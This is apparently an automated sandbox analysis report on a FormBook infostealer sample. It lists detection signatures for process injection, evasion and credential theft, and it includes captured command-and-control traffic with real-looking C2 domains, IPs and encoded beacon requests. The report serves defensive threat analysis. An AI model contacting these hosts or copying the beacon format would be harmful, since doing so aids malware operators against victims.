Windows Analysis Report
GJRX21GBj3.exe

Overview

General Information

Sample name: GJRX21GBj3.exe
renamed because original name is a hash value
Original sample name: 04ca4f891cf5c2c412c58340ec0de521f940f4b36c1b0b7f1aa1fdae080922aa.exe
Analysis ID: 1467022
MD5: 804cc1b2769f38027fd2c2bf8141013b
SHA1: b75af1f4f65b7f12ba311c3c14c67642c0898fb8
SHA256: 04ca4f891cf5c2c412c58340ec0de521f940f4b36c1b0b7f1aa1fdae080922aa
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://www.mybodyradar.net/nml2/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: GJRX21GBj3.exe ReversingLabs: Detection: 68%
Yara detected FormBook
Source: Yara match File source: 4.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: GJRX21GBj3.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: findstr.pdbGCTL source: ngen.exe, 00000004.00000002.2293830420.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924590936.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ngen.pdb source: findstr.exe, 00000007.00000002.3924355546.00000000031FE000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000003C7C000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000000.2360774678.00000000032FC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2627811818.00000000286EC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000000.2215505772.0000000000DFE000.00000002.00000001.01000000.00000005.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000000.2360491290.0000000000DFE000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP source: ngen.exe, 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2296210633.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2294244319.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: findstr.pdb source: ngen.exe, 00000004.00000002.2293830420.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000006.00000002.3924590936.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ngen.exe, ngen.exe, 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, findstr.exe, 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2296210633.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000003.2294244319.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E5BF10 FindFirstFileW,FindNextFileW,FindClose, 7_2_02E5BF10
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rsi 0_2_00007FF658600980
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rbx 0_2_00007FF658551988
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rsi 0_2_00007FF6586009D0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rdi 0_2_00007FF658600B00
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rbx 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rsi 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rbx 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rbx 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rbx 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rbx 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rbx 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rbx 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rsi 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rdi 0_2_00007FF6585D2430
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push r14 0_2_00007FF65865E3C0
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rsi 0_2_00007FF6585D2740
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 4x nop then push rbx 0_2_00007FF658551988
Source: C:\Windows\SysWOW64\findstr.exe Code function: 4x nop then xor eax, eax 7_2_02E49830
Source: C:\Windows\SysWOW64\findstr.exe Code function: 4x nop then pop edi 7_2_02E524A9
Source: C:\Windows\SysWOW64\findstr.exe Code function: 4x nop then pop edi 7_2_02E52487
Source: C:\Windows\SysWOW64\findstr.exe Code function: 4x nop then mov ebx, 00000004h 7_2_03490548

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49711 -> 23.227.38.74:80
Performs DNS queries to domains with low reputation
Source: DNS query: www.mg55aa.xyz
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 43.155.26.241 43.155.26.241
Source: Joe Sandbox View IP Address: 203.161.55.102 203.161.55.102
Source: Joe Sandbox View IP Address: 108.179.193.98 108.179.193.98
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /c7rq/?k06T=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+smLAouLcyIEijMeq9ccv2ntai0EWGFrkjFC0U/c7k/DTDLA==&rz=LZsl-bkp-XfXeRLp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.valerieomage.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
Source: global traffic HTTP traffic detected: GET /ktbm/?k06T=dCS0byWQIzTRzJnjmD3PHvju9v1sRk6AuoksZ/9OoI4xLWFKRKixtkjiz3Hv37r9oCCf0bTqtzy4xv37G1SgBfWJK+jN8eMH36uauFGPXBOtm3yBDVUMLLFQh/MQ7JKdaw==&rz=LZsl-bkp-XfXeRLp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.kosherphonestore.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
Source: global traffic HTTP traffic detected: GET /kwl6/?k06T=a60HvCvUhLiFhuUSc8WrKARCzXFsQAvffUZBz2uIU9nHYJX4NGLIPasF9EYqD4O1NmBy69LXG4mImYvzxGn1S/csb+glCs2OenUaXJQynPXKXRJsgC/umNodRP7idNP7JA==&rz=LZsl-bkp-XfXeRLp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.cwgehkk.storeConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
Source: global traffic HTTP traffic detected: GET /nml2/?k06T=HPoEs5HSsEYYnAW6PVozIACR+89TlHzFxT1N2ofTBBi/nJmbqmnSjRqVxPoNn0pwlxgNo3SmadBTH7enssKrgG8HFM9ue4Cv/jlK8Hwkml5mQyRFpKLBj5uVntz3S/FMqw==&rz=LZsl-bkp-XfXeRLp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mybodyradar.netConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
Source: global traffic HTTP traffic detected: GET /tb8p/?k06T=qOKUC29yX8oZAlbJDfcpCLzpMPZC9WFwxrZXgt1GanD4ODtcEeVG6I3ogONv/wZG3CcBcKt2BHXhpUQRSUiI6LSlbUKGOe5tpqy+YL001eRQtx2Jgk6C84cNpUHQ9eTwUQ==&rz=LZsl-bkp-XfXeRLp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.lacemalt.topConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
Source: global traffic HTTP traffic detected: GET /xti2/?k06T=QBz94yBRYCLuyG0lRWVoJ262XBKS6lrDLuuKlraC8+h4eo3ZkplyB9kY6zupybd5FXB5boaSfX9kd7InJ4l2/UGXXDPdESA3G681NsEYfip50N0NMaShmTLM2x7hQcZfKg==&rz=LZsl-bkp-XfXeRLp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.siteblogoficialon.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
Source: global traffic HTTP traffic detected: GET /7npk/?rz=LZsl-bkp-XfXeRLp&k06T=3lhlChS8FYnXqyMl6DrMwk16pFUOD90SHj/DecBTIjGSaQxy34ZC87B+/wA+Ty9En/TQ2WIUU2NJwAlG0p0MOprHpEJhuLS8Xg3IfDdoqaVi1Ch1kdwH1TvR7mgJgyRVyQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mg55aa.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
Source: global traffic DNS traffic detected: DNS query: www.gospelstudygroup.org
Source: global traffic DNS traffic detected: DNS query: www.valerieomage.com
Source: global traffic DNS traffic detected: DNS query: www.instantmailer.cloud
Source: global traffic DNS traffic detected: DNS query: www.kosherphonestore.com
Source: global traffic DNS traffic detected: DNS query: www.cwgehkk.store
Source: global traffic DNS traffic detected: DNS query: www.mybodyradar.net
Source: global traffic DNS traffic detected: DNS query: www.lacemalt.top
Source: global traffic DNS traffic detected: DNS query: www.siteblogoficialon.com
Source: global traffic DNS traffic detected: DNS query: www.mcxright.com
Source: global traffic DNS traffic detected: DNS query: www.amkmos.online
Source: global traffic DNS traffic detected: DNS query: www.mg55aa.xyz
Source: global traffic DNS traffic detected: DNS query: www.lavillitadepapa.com
Source: unknown HTTP traffic detected: POST /ktbm/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.kosherphonestore.comOrigin: http://www.kosherphonestore.comReferer: http://www.kosherphonestore.com/ktbm/Content-Length: 205Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53Data Raw: 6b 30 36 54 3d 51 41 36 55 59 46 54 2b 5a 68 62 66 72 4b 62 46 6b 42 69 59 64 75 50 6f 34 2f 56 7a 48 6b 75 55 69 70 77 63 53 37 4e 4c 77 70 55 6b 45 51 41 2f 52 34 4f 6d 31 58 44 61 33 43 33 73 7a 76 44 6b 76 6c 43 6f 78 62 33 64 6c 79 7a 77 32 6f 69 6d 4d 31 71 50 50 64 32 65 48 63 2f 4f 31 66 77 74 77 61 6d 2f 67 52 71 7a 52 56 48 31 34 6d 4f 56 4f 6c 68 46 45 49 52 47 68 65 68 77 6b 38 4c 6d 4f 76 7a 70 78 38 4f 52 5a 58 41 69 35 50 4d 77 45 52 30 49 63 68 6c 71 30 50 41 6f 4e 50 76 2b 4d 34 31 46 52 5a 78 33 34 50 55 2b 57 46 78 43 7a 47 70 31 78 73 30 5a 52 59 59 50 30 4b 4e 4c 6a 36 4f 64 33 6b 59 3d Data Ascii: k06T=QA6UYFT+ZhbfrKbFkBiYduPo4/VzHkuUipwcS7NLwpUkEQA/R4Om1XDa3C3szvDkvlCoxb3dlyzw2oimM1qPPd2eHc/O1fwtwam/gRqzRVH14mOVOlhFEIRGhehwk8LmOvzpx8ORZXAi5PMwER0Ichlq0PAoNPv+M41FRZx34PU+WFxCzGp1xs0ZRYYP0KNLj6Od3kY=
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 14:40:57 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 14:41:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 14:41:02 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 14:41:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925169217.0000000002CE1000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.lavillitadepapa.com
Source: pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925169217.0000000002CE1000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.lavillitadepapa.com/i1fz/
Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: GJRX21GBj3.exe String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: GJRX21GBj3.exe String found in binary or memory: https://aka.ms/nativeaot-c
Source: GJRX21GBj3.exe, 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: GJRX21GBj3.exe String found in binary or memory: https://aka.ms/nativeaot-compatibilityY
Source: GJRX21GBj3.exe String found in binary or memory: https://aka.ms/nativeaot-compatibilityy
Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: findstr.exe, 00000007.00000002.3927738841.0000000006600000.00000004.00000800.00020000.00000000.sdmp, findstr.exe, 00000007.00000002.3926054651.0000000005018000.00000004.10000000.00040000.00000000.sdmp, pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe, 00000008.00000002.3925534375.0000000004698000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
Source: findstr.exe, 00000007.00000003.2523816914.0000000008057000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
